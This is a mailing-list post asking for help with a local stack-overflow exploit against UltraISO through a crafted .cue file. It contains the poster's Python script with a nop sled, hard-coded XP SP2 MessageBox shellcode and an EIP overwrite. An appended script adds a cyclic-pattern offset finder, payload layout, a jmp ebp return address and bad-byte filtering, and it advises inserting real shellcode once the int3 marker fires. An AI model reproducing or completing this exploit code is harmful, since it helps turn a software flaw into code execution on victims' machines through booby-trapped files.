Vulnerability Development mailing list archives

Help developing exploit


From: KaCo678 () aol com
Date: 26 May 2007 17:32:12 -0000

Hi, I was wondering if you would be able to help. I recently found a stack overflow in UltraISO and was trying to write a local exploit for it. But I'm able to find the address where my nop sled is, and everything I've tried hasn't worked. And well, as you seem to be a well-respected member of the community, you might be able to help me. I've asked a few people for help with this one, but I'm still no further forward. I'll explain the best I can.

I'm able to control the ECX register and EIP. I attach OllyDbg and open the .cue file. The program crashes and my EIP points to 90909090 (the nop sled, lol). Then I press Shift+F9 and I can write anything I want to EIP, so for testing I wrote 41424344, which then got written to EIP and the ECX register. At 3299 bytes, then the 4 bytes to write to the registers. I've provided a little test script. It's a mess, but it's just for testing, mate. Also worth noting that we still have to actually fill the rest of the file, so altogether we have 5004 bytes to the file. I hope I'm making sense. I was gonna use the bouncing shared libraries method, but I'm not sure. I changed the EIP to the address 0x7C80C75B (jmp ebp), as my nops were in there somewhere. I've written a Python script I'm using to test it. Also, if you do take a look, you will need to create a fake .bin file in the same directory. Any help would be great, thanks for your time.

#!/usr/bin/python
###

head_file = b"\x46\x49\x4c\x45\x20\x22"  # header of file: FILE "

buffer1 = b"\x90" * 4000  # 4000 nops

nop = b"\x90" * 189  # 189 nops

# 110 bytes of shellcode: LoadLibraryA("user32.dll"), GetProcAddress(..., "MessageBoxA"),
# MessageBoxA(0, "Omega7", "Omega7", 0), then ExitProcess. The three 4-byte constants are
# hard-coded kernel32 addresses from Windows XP SP2. Each string ends in an 'N' placeholder
# that the code overwrites with a NUL at runtime, so no \x00 byte appears in the file.
shell  = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb"
shell += b"\x77\x1d\x80\x7c"  # 0x7c801d77, LoadLibraryA
shell += b"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"
shell += b"\x28\xac\x80\x7c"  # 0x7c80ac28, GetProcAddress
shell += b"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51"
shell += b"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff"  # call MessageBoxA, ExitProcess at 0x7c81caa2
shell += b"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"  # "user32.dll" + 'N'
shell += b"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"  # "MessageBoxA" + 'N'
shell += b"\xff\x4f\x6d\x65\x67\x61\x37\x4e"  # "Omega7" + 'N'

pad = b"\x90" * 2  # lost 2 bytes somewhere, made it up lol

offset = b"\x41\x42\x43\x44"  # "ABCD": the 4 bytes that land in EIP / ECX

buffer2 = b"\x45" * 701  # fill the rest of the file with junk

# end of file: .BIN" BINARY\r\n TRACK 01 MODE1/2352\r\n   INDEX 01 00:00:00
Head_end  = b"\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20"
Head_end += b"\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32"
Head_end += b"\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31"
Head_end += b"\x20\x30\x30\x3a\x30\x30\x3a\x30\x30"

with open("1.cue", "wb") as cue_file:
    cue_file.write(head_file + buffer1 + nop + shell + pad + offset + buffer2 + Head_end)

I'm very confused at the moment, as a few people have told me a few ways to exploit this, lol. But I'm still learning. I was wondering, could I just not point my EIP to my nop sled so my shellcode gets executed? I'm working with Windows XP SP2. Just can't seem to get to the address of my nop code.
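Two things the post leaves to hand counting are the exact distance to the saved return address and the layout of the final file. The script below is an added example, not the poster's script: it generates a Metasploit-style cyclic pattern so the dword that lands in EIP can be turned back into an offset, then lays out a nop sled, shellcode, return address and filler for a given EIP offset and total field size, and refuses to write a file whose payload contains bytes that would end the quoted filename early. The EIP offset of 3299, the 5004-byte size and the jmp ebp address 0x7C80C75B are taken from the post; the bad-byte set, the int3 placeholder shellcode and the assumption that the overflowed field is the quoted name between FILE " and .BIN" are assumptions made for the example.

```python
#!/usr/bin/env python3
"""Offset finder and .cue layout builder (added example, not the poster's script)."""

import struct

# Framing copied from the poster's cue file. Assumption: the overflowing string is
# the quoted filename between FILE " and .BIN".
CUE_HEAD = b'FILE "'
CUE_TAIL = b'.BIN" BINARY\r\n TRACK 01 MODE1/2352\r\n   INDEX 01 00:00:00'

# Assumed bad bytes for a quoted filename field: NUL, the closing quote, CR, LF.
BAD_BYTES = b'\x00"\r\n'

# Constructed placeholder shellcode: int3 breakpoints, so OllyDbg stops the moment
# execution reaches the end of the sled. Swap in real shellcode once that works.
INT3_MARKER = b"\xcc" * 8


def cyclic_pattern(length):
    """Metasploit-style pattern 'Aa0Aa1Aa2...'; every 4-byte window is unique up to 20280 bytes."""
    out = bytearray()
    for a in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for b in b"abcdefghijklmnopqrstuvwxyz":
            for c in b"0123456789":
                out += bytes((a, b, c))
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern, eip_value):
    """Map the dword seen in EIP (the int shown by the debugger, or the raw 4 bytes) to its offset."""
    needle = eip_value if isinstance(eip_value, bytes) else struct.pack("<I", eip_value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern; EIP may not come from this buffer")
    return idx


def find_bad_bytes(payload, bad=BAD_BYTES):
    """Return (offset, byte) for every byte that would break the quoted field."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def build_payload(eip_offset, total_len, ret_addr, shellcode=INT3_MARKER):
    """Layout [nop sled][shellcode][ret_addr][filler]; sled + shellcode end exactly at eip_offset."""
    sled_len = eip_offset - len(shellcode)
    if sled_len < 0:
        raise ValueError("shellcode does not fit before the return address")
    filler_len = total_len - eip_offset - 4
    if filler_len < 0:
        raise ValueError("total_len is smaller than eip_offset + 4")
    ret = struct.pack("<I", ret_addr)  # little-endian, the way it sits on the stack
    return b"\x90" * sled_len + shellcode + ret + b"E" * filler_len


def build_cue(payload):
    """Wrap the payload in the cue framing, refusing payloads that contain bad bytes."""
    bad = find_bad_bytes(payload)
    if bad:
        raise ValueError("bad bytes in payload (first few): %r" % bad[:5])
    return CUE_HEAD + payload + CUE_TAIL


if __name__ == "__main__":
    # Stage 1: crash on a pattern of the same size and read EIP in OllyDbg,
    # then pattern_offset(cyclic_pattern(5004), <EIP value>) gives the offset.
    with open("pattern.cue", "wb") as f:
        f.write(build_cue(cyclic_pattern(5004)))
    # Stage 2: the post's numbers: EIP offset 3299, 5004-byte field, jmp ebp at 0x7C80C75B.
    with open("1.cue", "wb") as f:
        f.write(build_cue(build_payload(3299, 5004, 0x7C80C75B)))
```

With the int3 marker in place, a successful jmp ebp shows up as a breakpoint exception inside the sled rather than a silent crash, which separates "the return address is wrong" from "the sled is right but the shellcode is broken". Once the marker fires, replace INT3_MARKER with the real shellcode and run find_bad_bytes on it before writing the file.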

